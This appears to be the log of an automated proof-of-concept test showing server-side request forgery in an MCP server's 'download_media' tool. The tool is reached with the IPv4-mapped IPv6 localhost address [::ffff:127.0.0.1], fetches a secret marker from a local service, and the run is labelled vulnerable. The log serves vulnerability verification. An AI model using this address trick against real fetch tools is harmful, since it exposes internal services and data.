[VICTIM] Listening on 127.0.0.1:18080 marker=SSRF_SECRET_MARKER_1783015602673_hgnjlkyh [MCP-SEND] {"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2024-11-05","capabilities":{},"clientInfo":{"name":"ssrf-test-client","vers [MCP-RESP] {"result":{"protocolVersion":"2024-11-05","capabilities":{"tools":{"listChanged":true}},"serverInfo":{"name":"auth-fetch","version":"3.0.1"},"instructions":"When a user asks to read, summarize, or access a URL and Fetch/web_fetch returns a login page, empty HTML shell, or minimal content (especially [MCP-SEND] {"jsonrpc":"2.0","method":"notifications/initialized"} [MCP-SEND] {"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"download_media","arguments":{"urls":["http://[::ffff:127.0.0.1]:18080/"]}}} [VICTIM:18080] 2026-07-02T18:06:43.648Z Request from 127.0.0.1 path=/ [MCP-RESP] {"result":{"content":[{"type":"text","text":"{\"status\":\"ok\",\"directory\":\"/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-vulnerable/.auth-fetch-mcp/downloads/2026-07-02T18-06-43\",\"downloaded\":1,\"total\":1,\"files\":[{\"url\":\"http://[::ffff:127.0.0.1]:18080/\", *** SSRF CONFIRMED [vulnerable]: Downloaded file contains internal server marker! *** === RESULT [vulnerable] === { "label": "vulnerable", "marker": "SSRF_SECRET_MARKER_1783015602673_hgnjlkyh", "timedOut": false, "serverStarted": true, "healthcheckPassed": true, "toolCallReceived": true, "ssrfConfirmed": true, "blocked": false, "browserError": false, "downloadedFile": "/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-vulnerable/.auth-fetch-mcp/downloads/2026-07-02T18-06-43/file-1.bin", "downloadedContent": "SSRF_SECRET_MARKER_1783015602673_hgnjlkyh", "toolResult": { "status": "ok", "directory": "/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-vulnerable/.auth-fetch-mcp/downloads/2026-07-02T18-06-43", "downloaded": 1, "total": 1, "files": [ { "url": "http://[::ffff:127.0.0.1]:18080/", "localPath": "/data/pruva/runs/fd8b0986-aae9-476e-9f56-120d746759eb/bundle/logs/mcp-home-vulnerable/.auth-fetch-mcp/downloads/2026-07-02T18-06-43/file-1.bin", "size": 41 } ] }, "error": null }